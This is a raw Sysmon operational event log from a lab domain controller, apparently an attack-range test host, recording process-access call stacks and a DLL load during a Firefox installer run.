Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000016241Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+2995e(wow64)|C:\Windows\System32\shcore.dll+29cab(wow64)|C:\Windows\System32\windows.storage.dll+1e3eaa(wow64)|C:\Windows\System32\windows.storage.dll+10ace8(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+22d3|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+13a8 10341000x800000000000000016240Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1e3e9c(wow64)|C:\Windows\System32\windows.storage.dll+10ace8(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000016239Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1e3e9c(wow64)|C:\Windows\System32\windows.storage.dll+10ace8(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000016238Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.161{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-9459-6005-2E05-00000000A301}2680C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000016237Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:53.161{59A5CD1D-9459-6005-2E05-00000000A301}2680C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exeC:\Users\ADMINI~1\AppData\Local\Temp\nseD8BD.tmp\System.dll2021-01-18 13:59:53.161 10341000x800000000000000016236Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.146{59A5CD1D-8E46-6005-1600-00000000A301}15444140C:\Windows\system32\svchost.exe{59A5CD1D-9459-6005-2E05-00000000A301}2680C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016235Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.146{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9459-6005-2E05-00000000A301}2680C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016234Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.146{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016233Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.146{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016232Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.146{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016231Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.146{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016230Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.146{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016229Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.146{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016228Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.146{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016227Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.146{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016226Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.146{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016225Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.146{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016224Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.146{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016223Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.146{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016222Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.146{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 